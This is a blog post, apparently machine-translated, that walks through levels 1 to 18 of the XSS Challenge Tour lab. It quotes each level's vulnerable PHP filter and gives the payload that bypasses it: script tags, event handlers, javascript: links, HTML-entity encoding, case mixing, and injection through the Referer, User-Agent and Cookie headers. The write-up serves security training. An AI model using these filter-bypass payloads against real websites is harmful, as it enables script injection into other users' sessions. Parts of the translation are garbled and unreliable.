XSS Challenge Tour (by reading the code)

XSS Challenge Tour

level 1

There is no filtering

payload:

<script>alert(1)</script>

level 2

php key code:

echo "<h2 align=center>And not found".htmlspecialchars($str)."Relevant results.</h2>".'<center>

<input name=keyword  value="'.$str.'">

Analysis:

str is a controllable variable, the above line is materialized and hopeless.

The second line of code is not filtered, just close the input tag.

payload:

"><script>alert(1)</script>&submit=search

level 3

Key Code:

<input name=keyword  value='".htmlspecialchars($str)."'>

Analysis:

html is materialized, so tags can't be used, events from js can be used to trigger xss, and single quotes can be used when closing.

payload:

'> onmouseover=alert(1) b='&submit=search

level 4

Key Code:

$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);

<input name=keyword  value="'.$str3.'">

Analysis:

Get keyword, leave the angle brackets blank, still use js events, and close with double quotes.

payload:

aa" onmouseover=alert(1) b="

level 5

Key Code:

$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);

<input name=keyword  value="'.$str3.'">

Analysis:

First converts keyword to lowercase, then destroys script and on.

Use the js protocol of tag a to trigger xss.After submitting, click on that connection to trigger it.

payload:

"><a href="javascript:alert(1)">

level 6

Key Code:

$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);

<input name=keyword  value="'.$str6.'">

Analysis:

Similar to level 5, script,on,src,data,href, etc. are filtered, but there is no case conversion, so case mixing can be used to bypass them.

payload:

"><a Href="javascript:alert(1)">
"><img Src=x Onerror=alert(1)>

level 7

Key Code:

$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);

<input name=keyword  value="'.$str6.'">

Analysis

Lowercase conversion was performed, and script,on,src,data,href, and so on were filtered.

Word nesting can be used to bypass, for example, script can be written as scrSCRIPTipt

payload:

"><scscriptript>alert(1)</scrscriptipt>

level 8

Key Code:

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);

 echo '<center><BR><a href="'.$str7.'">Friendly Links</a></center>';

Analysis

The filter is almost the same as before, plus double quotation marks.

Similar to the fifth level, you can use the js protocol.But because script is filtered, entity encoding is needed to filter.

For javascript:alert(1) Encoding

payload:

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41

Tip:

Encoding python code:

def unicodeHtml(self, orgCode):
    self.enCode['unicodeHtml'] = ';'.join(
        '&#{}'.format(ord(x)) for x in orgCode)

Harvest

Other cousins on the Internet said they could bypass it like this:

You can use empty characters, spaces, TAB line breaks, comments, special functions to separate code for filtering, for example:

javas%09cript:alert()

javas%0acript:alert()

javas%0dcript:alert()

%09:tab
%0a:linefeed(Line Break)
%0d:creturn

But I tried:

em~Fans, we searched before we knew it wasHttpd.confConfiguration issues.

<Directory />
    Options FollowSymLinks
    AllowOverride None
    Order deny,allow
    Deny from all
</Directory>

Replace this paragraph with:

<Directory />  
    Options Indexes FollowSymLinks  
    AllowOverride None  
</Directory>

em~There's nothing to change, maybe it's my environmental problem speaker.Occupy a hole.

level 9

Key Code:

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);

<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="Is your link illegal?Is there any!">Friendly Links</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">Friendly Links</a></center>';
}

Analysis

Daily filtering, unlawful if keyword does not contain http://Add it after encoding.

payload:

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41 //http://

level 10

Key Code:

$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>And not found".htmlspecialchars($str)."Relevant results.</h2>".'<center>

<input name="t_sort"  value="'.$str33.'" type="hidden">

Analysis

The keyword parameter is not used because the str variable is passed in and then directly materialized and output.

It is found that you can also pass a t_sort parameter and simply filter the angle brackets, so close it and use the js event.

However, we found that the label for the t_sort value is hidden, so we changed it to visible here.

payload:

" onmouseover=alert(1) type="text" //
<!--Visit:/level10.php?keyword=well%20done!&t_sort=" onmouseover=alert(1) type="text" //-->

level 11

Key Code:

$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>And not found".htmlspecialchars($str)."Relevant results.</h2>".'<center>

<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">

Analysis

Both keyword and t_sort are materialized, and they are useless.

A $_SERVER['HTTP_REFERER'] appears here

This variable just filters the angle brackets, so how does this variable get in?

You can change the package by grabbing the package:

payload:

burpsuite is used here to implement package modification

Add a: Referer:'onmouseover=alert(1) type='text'//

Then click forward.

level 12

Key Code:

$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);

<input name="t_ua"  value="'.$str33.'" type="hidden">

Analysis

Similar to what just happened, it's also about changing your package.

payload:

Change the value of User-Agent to "onmouseover=alert(1) type="text "//

level 13

Key Code:

setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);

<input name="t_cook"  value="'.$str33.'" type="hidden">

Analysis

Grab a bag, change cookie s

payload:

Cookie: user=" onmouseover=alert(1) type="text" //

level 14

Not very clear, there is an answer in the last reference.

level 15

Key Code:

<script src="https://cdn.staticfile.org/angular.js/1.4.6/angular.min.js"></script>

$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';

Analysis

Looking at the analysis of the big guys, I know this is using the Angular JS ng-include directive.

The ng-include directive is used to contain external HTML files.

The content contained will act as a child node of the specified element.

The value of the ng-include property can be an expression that returns a file name.

By default, the included files need to be contained under the same domain name.

When you visit/level15.php?src='level1.php', you will introduce the file of Level 6 to this page:

So we can take advantage of payload s we've used before, like Level 1.

payload:

/level15.php?src='level1.php?name=<img src=1 onerror=alert(1)>'

level 16

Key Code:

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace("	","&nbsp;",$str4);
echo "<center>".$str5."</center>";

Analysis

Use:%0d%0a to separate

payload:

<img%0Dsrc=1%0Donerror=alert(1)>

level 17

Key Code:

echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";

Analysis

html instantiation, triggered via on.

payload:

%20onmouseover=alert(1)

Source code after execution:

<embed src=xsf01.swf?a= onmouseover=alert(1) width=100% heigth=100%><h2 align=center>After success,<a href=level18.php?arg01=a&arg02=b>Click on me to enter the next level</a></h2>

level 18

Key Code:

echo "<embed src=xsf02.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";

Analysis

It feels like 17.

payload:

%20onmouseover=alert(1)

19 and 20 won't.

Reference resources:

XSS Challenge Tour (1~10)
https://www.jianshu.com/p/550529813397

XSS Challenge Tour--Game Breakout
https://www.jianshu.com/p/4e3a517bc4ea

Dwarf on Giant's Shoulder XSS Challenge Trip - Game Solutions (Update to Level 18)
https://xz.aliyun.com/t/1206?accounttraceid=74ab404d-2a01-4a1c-8b87-36ad367dbe11#toc-12

Tags: PHP encoding Javascript angular

Posted on Fri, 15 May 2020 21:04:31 -0400 by alexislalas